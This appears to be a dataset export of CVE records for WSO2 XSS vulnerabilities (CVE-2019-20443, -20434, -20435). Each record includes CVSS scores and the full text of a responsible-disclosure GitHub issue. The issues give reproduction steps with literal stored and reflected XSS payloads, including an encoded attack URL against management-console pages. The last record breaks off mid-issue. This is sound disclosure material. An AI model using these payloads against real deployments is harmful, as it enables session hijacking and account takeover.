# Details: WSO2 Product Bug Report Bug Name: Stored <a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)">Cross Site Scripting (XSS)</a> Product Name: <a href="https://wso2.com/">WSO2</a> Server: <a href="https://wso2.com/identity-and-access-management/#">WSO2 Identity Server</a> Version: <a href="https://docs.wso2.com/display/IS570/About+this+Release">5.7.0</a> Homepage: https://wso2.com/ Severity: Low Status: Fixed Exploitation Requires Authentication?: <strong>yes</strong> Vulnerable URL: https://localhost:9444/carbon/resources/add_role_permission_ajaxprocessor.jsp Vulnerable Variable: <strong>roleToAuthorize</strong> # AFFECTED PRODUCTS: [1] WSO2 API Manager [2] WSO2 API Manager Analytics [3] WSO2 IS as Key Manager [4] WSO2 IS as Key Manager [5] WSO2 Identity Server [6] WSO2 Identity Server Analytics # Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies which means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. # Proof of concept: (POC) The following Vulnerability is tested on WSO2 Identity Server version 5.7.0 Product. <strong>Issue 01: Stored cross site scripting:</strong> ![Picture1](https://user-images.githubusercontent.com/13975575/72722376-2d5d8380-3ba4-11ea-9073-37ac5164f48e.png) Figure 01: Choose <a href="https://192.168.0.179:9444/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/">“Browse”</a> from the Registry option ![Picture2](https://user-images.githubusercontent.com/13975575/72722368-2c2c5680-3ba4-11ea-940e-4fad4c5b9822.png) Figure 02: Select any on `‘Role’` and add <a href="https://192.168.0.179:9444/carbon/resources/add_role_permission_ajaxprocessor.jsp">“Permission”</a> from “Permission section in the same page. ![Picture3](https://user-images.githubusercontent.com/13975575/72722369-2cc4ed00-3ba4-11ea-96ae-70c0543be982.png) Figure 03: Capture the POST request in burp suite proxy and add XSS payload, `“><img src=x onerror=prompt(1)>` to `“roleToAuthorize”` variable ![Picture4](https://user-images.githubusercontent.com/13975575/72722373-2cc4ed00-3ba4-11ea-975e-91c2e69ab43c.png) Figure 04: Injected XSS Payload gets stored and executed in the browser ![Picture5](https://user-images.githubusercontent.com/13975575/72722375-2cc4ed00-3ba4-11ea-893a-7a01bc38d1aa.png) Figure 05: The stored XSS payload gets executed whenever the user loads the page --- <strong>Reproducing Steps</strong> 1. Login to the Application. 2. Go to <a href="https://192.168.0.179:9444/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/">URL.</a> 3. Select any on ‘Role’ and add <a href="https://192.168.0.179:9444/carbon/resources/add_role_permission_ajaxprocessor.jsp">“Permission”</a> from “Permission section in the same page. 4. Capture the POST request in burp suite proxy and add XSS payload, `“><img src=x onerror=prompt(1)>` to `“roleToAuthorize”` variable 5. Now the injected XSS payload gets stored and executes whenever the user loads the page. --- <strong>Timeline</strong> 2019-07-02 – Discovered in `WSO2 Identity Server 5.7.0` Version 2019-07-02 – Reported to security@wso2.com 2019-07-02 – Got instant response from WSO2 security team, "Thanks for your analysis report. We will evaluate your finding and get back to you soon with our feedback." 2019-08-13 - Fixing in all affected versions 2019-09-10 - Customer Announcement Done. Public Announcement is scheduled at the end of September 2019-10-08 - Got mail saying, "We have scheduled a public announcement for the issue by the end of this week" 2019-11-04 - Got mail saying, "Customer Announcement is done. Public Announcement is scheduled at end of November" 2019-12-03 - Got mail saying, "We have done the public announcement for the remaining two issues. Kindly note that we have aggregated the following two issues." 2019-12-03 - Got mail saying, "... stored XSS issues [Document No: 1050 & Document No: 1051] were reported in registry UI. After analyzing the impact, CVSS Score and fix for the above two issues, we decided to deliver the fix with the same advisory id and patch since the issues could be fixed in the same component. ..." Please <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0636">refer </a>[1] for Security Advisory <strong>Note:</strong> Since, we have contributed on <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265">WSO2-2017-0265,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0616">WSO2-2019-0616, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0633">WSO2-2019-0633, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0634">WSO2-2019-0634, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0635">WSO2-2019-0635,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0644">WSO2-2019-0644,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0645">WSO2-2019-0645,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0647">WSO2-2019-0647</a> and <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0646">WSO2-2019-0646</a> to WSO2 team, our name already got listed in their security acknowledgment <a href="https://docs.wso2.com/display/Security/Acknowledgments">page</a> [2] [1] https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0636 [2] https://docs.wso2.com/display/Security/Acknowledgments --- <strong>Discovered by:</strong> <a href="sathish.co.in">Sathish Kumar Balakrishnan</a> from <a href="http://www.cybersecurityworks.com">Cyber Security Research Lab</a>
Stored Cross Site Scripting (XSS) in 'roleToAuthorize' variable | WSO2 Product (WSO2 Identity Server version 5.7.0)
https://api.github.com/repos/cybersecurityworks/Disclosed/issues/25/comments
0
2020-01-20T11:16:47Z
2020-01-20T11:16:47Z
https://github.com/cybersecurityworks/Disclosed/issues/25
552,235,262
25
1,036
CVE-2019-20443
2020-01-28T00:15:10.993
An issue was discovered in WSO2 API Manager 2.6.0, WSO2 Enterprise Integrator 6.5.0, WSO2 IS as Key Manager 5.7.0, and WSO2 Identity Server 5.8.0. A potential stored Cross-Site Scripting (XSS) vulnerability in mediaType has been identified in the registry UI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 0.9, "impactScore": 2.5, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20443-wso2.html" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0636" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20443-wso2.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0636" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wso2:api_manager:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC168B6A-B15A-4C3B-A38D-C0B65F24F333", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:wso2:enterprise_integrator:6.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "4FCA89E3-F37E-494E-AD46-B9A04E608908", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:wso2:identity_server:5.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "60781FE4-38A3-4FEA-9D8B-CADE4B535974", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:wso2:identity_server:5.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B169832-A746-49A6-8E92-06624AA9B13A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cybersecurityworks/Disclosed/issues/26
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cybersecurityworks", "Disclosed" ]
# Details: WSO2 Product Bug Report Bug Name: Stored <a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)">Cross Site Scripting (XSS)</a> Product Name: <a href="https://wso2.com/">WSO2</a> Server: <a href="https://wso2.com/identity-and-access-management/#">WSO2 Identity Server</a> Version: <a href="https://docs.wso2.com/display/IS570/About+this+Release">5.7.0</a> Homepage: https://wso2.com/ Severity: Low Status: Fixed Exploitation Requires Authentication?: <strong>yes</strong> Vulnerable URL: https://192.168.0.138:9444/carbon/resources/update_mediatype_ajaxprocessor.jsp Vulnerable Variable: <strong>mediaType</strong> # AFFECTED PRODUCTS: [1] WSO2 API Manager [2] WSO2 API Manager Analytics [3] WSO2 IS as Key Manager [4] WSO2 IS as Key Manager [5] WSO2 Identity Server [6] WSO2 Identity Server Analytics # Description: Cross Site Scripting (XSS) vulnerability in WSO2 Identity server. By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies which means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. # Proof of concept: (POC) The following Vulnerability is tested on WSO2 Identity Server version 5.7.0 Product. <strong>Issue 01: Stored cross site scripting:</strong> ![Picture1](https://user-images.githubusercontent.com/13975575/72723224-33546400-3ba6-11ea-932c-b47d28abccc7.png) Figure 01: Edit `“Media Type”` value in `“Metadata”` section ![Picture2](https://user-images.githubusercontent.com/13975575/72723225-33546400-3ba6-11ea-9a5e-7e1a5de806f6.png) Figure 02: Save `“Media Type”` with XSS payload, `“><img src=x onerror=prompt(1)>` ![Picture3](https://user-images.githubusercontent.com/13975575/72723226-33546400-3ba6-11ea-8ffe-454cc16a77fe.png) Figure 03: Injected XSS payload gets stored to the application ![Picture4](https://user-images.githubusercontent.com/13975575/72723228-33ecfa80-3ba6-11ea-910c-2c99a824bda7.png) Figure 04: Injected XSS Payload gets stored and executed in the browser ![Picture5](https://user-images.githubusercontent.com/13975575/72723230-33ecfa80-3ba6-11ea-9dce-2f3b37f73ab5.png) Figure 05: The stored XSS payload gets executed in`4 different places` throughout the page whenever the user loads the page --- <strong>Reproducing Steps</strong> 1. Login to the Application 2. Go to <a href="https://192.168.0.138:9444/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&viewType=std&path=/_system">URL.</a> 3. Click on Metadata to edit values 4. Edit & Save `“Media Type”` value with XSS Payload, `“><img src=x onerror=prompt(1)>` 5. Now, the injected XSS Payload gets executed whenever the user visits the page. --- <strong>Timeline</strong> 2019-07-02 – Discovered in `WSO2 Identity Server 5.7.0` Version 2019-07-02 – Reported to security@wso2.com 2019-07-02 – Got instant response from WSO2 security team, "Thanks for your analysis report. We will evaluate your finding and get back to you soon with our feedback." 2019-08-13 - Fixing in all affected versions 2019-09-10 - Customer Announcement Done. Public Announcement is scheduled at the end of September 2019-10-08 - Got mail saying, "We have scheduled a public announcement for the issue by the end of this week" 2019-11-04 - Got mail saying, "Customer Announcement is done. Public Announcement is scheduled at end of November" 2019-12-03 - Got mail saying, "We have done the public announcement for the remaining two issues. Kindly note that we have aggregated the following two issues." 2019-12-03 - Got mail saying, "... stored XSS issues [Document No: 1050 & Document No: 1051] were reported in registry UI. After analyzing the impact, CVSS Score and fix for the above two issues, we decided to deliver the fix with the same advisory id and patch since the issues could be fixed in the same component. ..." Please <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0636">refer </a>[1] for Security Advisory <strong>Note:</strong> Since, we have contributed on <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265">WSO2-2017-0265,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0616">WSO2-2019-0616, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0633">WSO2-2019-0633, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0634">WSO2-2019-0634, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0635">WSO2-2019-0635,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0644">WSO2-2019-0644,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0645">WSO2-2019-0645,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0647">WSO2-2019-0647</a> and <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0646">WSO2-2019-0646</a> to WSO2 team, our name already got listed in their security acknowledgment <a href="https://docs.wso2.com/display/Security/Acknowledgments">page</a> [2] [1] https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0636 [2] https://docs.wso2.com/display/Security/Acknowledgments --- <strong>Discovered by:</strong> <a href="sathish.co.in">Sathish Kumar Balakrishnan</a> from <a href="http://www.cybersecurityworks.com">Cyber Security Research Lab</a>
Stored Cross Site Scripting (XSS) in 'mediaType' variable | WSO2 Product (WSO2 Identity Server version 5.7.0)
https://api.github.com/repos/cybersecurityworks/Disclosed/issues/26/comments
0
2020-01-20T11:30:13Z
2020-01-20T11:30:13Z
https://github.com/cybersecurityworks/Disclosed/issues/26
552,242,400
26
1,037
CVE-2019-20434
2020-01-28T01:15:11.783
An issue was discovered in WSO2 API Manager 2.6.0. A potential Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Datasource creation page of the Management Console.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20434-wso2.html" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0616" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20434-wso2.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0616" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/17" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wso2:api_manager:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC168B6A-B15A-4C3B-A38D-C0B65F24F333", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cybersecurityworks/Disclosed/issues/17
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cybersecurityworks", "Disclosed" ]
# Details: WSO2 Product Bug Report Bug Name: Multiple <a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)">Cross Site Scripting (XSS)</a> Product Name: <a href="https://wso2.com/">WSO2</a> Server: <a href="https://docs.wso2.com/display/DAS320/WSO2+Data+Analytics+Server+Documentation">WSO2 Data Analytics Server Product.</a> Version: <a href="https://github.com/wso2/product-das/archive/v3.2.0.zip">3.2.0</a> Homepage: https://wso2.com/ Severity: Medium Status: Fixed Exploitation Requires Authentication?: <strong>yes</strong> Vulnerable URL: [1] https://WSO2IP:9443/carbon/properties/properties-ajaxprocessor.jsp [2] https://WSO2IP:9443/carbon/ndatasource/newdatasource.jsp Vulnerable Variable: [1] <strong>path & name </strong> [2] <strong>dsProvider </strong> # Description: Cross Site Scripting (XSS) vulnerability in WSO2 Data Analytics Server Product. By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies which means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. # Proof of concept: (POC) <strong>Issue 1 & 2: </strong> Access the <a href="https://192.168.0.139:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/">URL,</a> and add XSS payload `xss”><script>alert(1)</script>` through vulnerable variable <strong>path & name</strong> to execute XSS in the POST request <a href="https://192.168.0.139:9443/carbon/properties/properties-ajaxprocessor.jsp">URL.</a> ![1](https://user-images.githubusercontent.com/13975575/69712340-a9999480-1128-11ea-99a8-5b9d7139fca1.png) Figure 1: Access the <a href="https://192.168.0.139:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/">URL</a> ![2](https://user-images.githubusercontent.com/13975575/69712357-b0280c00-1128-11ea-9eb1-99ed651bac9f.png) Figure 2: Add new property. ![3](https://user-images.githubusercontent.com/13975575/69712387-bcac6480-1128-11ea-9d1d-f71980b772d4.png) Figure 3: XSS payload added to `path` variable and gets reflected in the response. ![4](https://user-images.githubusercontent.com/13975575/69712405-c6ce6300-1128-11ea-8955-9b3c5de75089.png) Figure 4: Injected XSS payload gets reflected in the browser. ![5](https://user-images.githubusercontent.com/13975575/69712420-cfbf3480-1128-11ea-9088-219047f4b1dd.png) Figure 5: XSS payload added to `name` variable and gets reflected in the response. ![6](https://user-images.githubusercontent.com/13975575/69712439-d77ed900-1128-11ea-88d2-0e1cd80c157a.png) Figure 6: Injected XSS payload gets reflected in the browser. <strong>Issue 3: </strong> Access the GET request <a href="https://192.168.0.139:9443/carbon/ndatasource/newdatasource.jsp?dsProvider=XSS%22%3e%3cscript%3ealert(1)%3c/script%3e&dsName=xss%22%3e&description=xss%22%3e">URL</a> (added with XSS payload) directly to see XSS getting reflected in the browser. ![7](https://user-images.githubusercontent.com/13975575/69712468-e06faa80-1128-11ea-8e29-d5b52993ed1c.png) Figure 7: Access the <a href="https://192.168.0.139:9443/carbon/ndatasource/newdatasource.jsp">URL</a> to add new Data Source ![8](https://user-images.githubusercontent.com/13975575/69712503-f1202080-1128-11ea-8ee3-4b3d6d1fda65.png) Figure 8: capturing the GET request and added XSS payload gets reflected in the response. ![9](https://user-images.githubusercontent.com/13975575/69712517-f8dfc500-1128-11ea-8275-055f1399a80b.png) Figure 9: Injected XSS payload, `XSS%22%3e%3cscript%3ealert(1)%3c/script%3e` through vulnerable <strong>dsProvider</strong> gets reflected whenever the user tries to access the <a href="https://192.168.0.139:9443/carbon/ndatasource/newdatasource.jsp?dsProvider=XSS%22%3e%3cscript%3ealert(1)%3c/script%3e&dsName=xss%22%3e&description=xss%22%3e">URL.</a> --- <strong>Reproducing Steps</strong> <strong>Issue 01 & 02:</strong> 1. Logon into data analytics server with given credentials (admin/admin in localhost) in the <a href="https://192.168.0.139:9443/carbon">URL</a> (Localhost IP) 2. Now, access the <a href="https://192.168.0.139:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/">URL</a> 3. Add new property and capture the request in proxy and send it to repeater. 4. Add XSS payload `xss"><script>alert(1)</script>` to <strong>path & name</strong> variable one by one. 5. Then, the Injected XSS Payload `xss"><script>alert(1)</script>` will get reflected in the response. <strong>Issue 03:</strong> 1. Logon into data analytics server with given credentials (admin/admin in localhost) in the <a href="https://192.168.0.139:9443/carbon">URL</a> (Localhost IP) 2. Now, access the <a href="https://192.168.0.139:9443/carbon/ndatasource/newdatasource.jsp">URL</a> to add new Data Source with encoded XSS payload `XSS%22%3e%3cscript%3ealert(1)%3c/script%3e` and submit the data which gets reflected in the browser. 3. Or access the <a href="https://192.168.0.139:9443/carbon/ndatasource/newdatasource.jsp?dsProvider=XSS%22%3e%3cscript%3ealert(1)%3c/script%3e&dsName=xss%22%3e&description=xss%22%3e">URL</a> (added with XSS payload) directly to see XSS getting reflected in the browser. --- <strong>Timeline</strong> 2019-05-04 – Discovered in WSO2 Data Analytics Server Product version 3.1.0 2019-05-04 – Reported to security@wso2.com 2019-05-07 - Got response from WSO2 security team, "We are looking into the issues you have reported. We will keep you posted regarding the progress of our evaluation of them." 2019-05-09 - Got mail confirming the <strong>Issue 3</strong> and rejecting the <strong>Issue 1 & 2</strong> are not a valid issue. 2019-07-12 - Customer Announcement - End of July, Public Announcement: End of August. 2019-08-13 - Customer Announcement is done. Public Announcement is scheduled. 2019-09-10 - Public Announcement is done. Please refer [1] for Security Advisory <strong>Note:</strong> Since, we have contributed <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265">WSO2-2017-0265</a> to WSO2 team, our name already got listed in their security acknowledgment <a href="https://docs.wso2.com/display/Security/Acknowledgments">page</a> [2] [1] https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0616 [2] https://docs.wso2.com/display/Security/Acknowledgments --- <strong>Discovered by:</strong> <a href="sathish.co.in">Sathish Kumar Balakrishnan</a> from <a href="http://www.cybersecurityworks.com">Cyber Security Research Lab</a>
Multiple Reflected Cross Site Scripting (XSS) in WSO2 Product (Data Analytics Server Version 3.2.0)
https://api.github.com/repos/cybersecurityworks/Disclosed/issues/17/comments
0
2019-11-27T10:43:00Z
2019-11-27T10:43:00Z
https://github.com/cybersecurityworks/Disclosed/issues/17
529,263,538
17
1,038
CVE-2019-20435
2020-01-28T01:15:11.877
An issue was discovered in WSO2 API Manager 2.6.0. A reflected XSS attack could be performed in the inline API documentation editor page of the API Publisher by sending an HTTP GET request with a harmful docName request parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 0.9, "impactScore": 2.5, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20435-wso2.html" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0633" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20435-wso2.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0633" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/18" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wso2:api_manager:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC168B6A-B15A-4C3B-A38D-C0B65F24F333", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cybersecurityworks/Disclosed/issues/18
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cybersecurityworks", "Disclosed" ]
# Details: WSO2 Product Bug Report Bug Name: <a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)">Cross Site Scripting (XSS)</a> Product Name: <a href="https://wso2.com/">WSO2</a> Server: <a href="https://docs.wso2.com/display/AM260/Installing+via+the+Installer#InstallingviatheInstaller-installDownloadandinstalltheproduct">WSO2 API Manager Product.</a> Version: <a href="https://docs.wso2.com/display/AM260/About+this+Release">2.6.0</a> Homepage: https://wso2.com/ Severity: Low Status: Fixed Exploitation Requires Authentication?: <strong>yes</strong> Vulnerable URL: https://192.168.107.2:9443/publisher/site/blocks/documentation/ajax/docs.jag Vulnerable Variable: <strong>docName</strong> # Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies which means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. # Proof of concept: (POC) POST request `docName` variable is vulnerable to reflected cross site scripting (XSS) in the URL, https://192.168.107.2:9443/publisher/site/blocks/documentation/ajax/docs.jag ![1](https://user-images.githubusercontent.com/13975575/69720809-76133600-1139-11ea-8bc5-ce214e9cb296.png) Figure 01: New document created in the API ![2](https://user-images.githubusercontent.com/13975575/69720829-83c8bb80-1139-11ea-93eb-8a1d449a359c.png) Figure 02: Choose ‘Edit Content’ to edit document information. ![3](https://user-images.githubusercontent.com/13975575/69720838-89be9c80-1139-11ea-83f1-d6f65853c66c.png) Figure 03: Actual GET request <a href="https://192.168.107.2:9443/publisher/site/pages/inline-editor.jag?docName=XSS&apiName=test&version=2.0&provider=admin&mode=edit&tenant=carbon.super">URL</a> 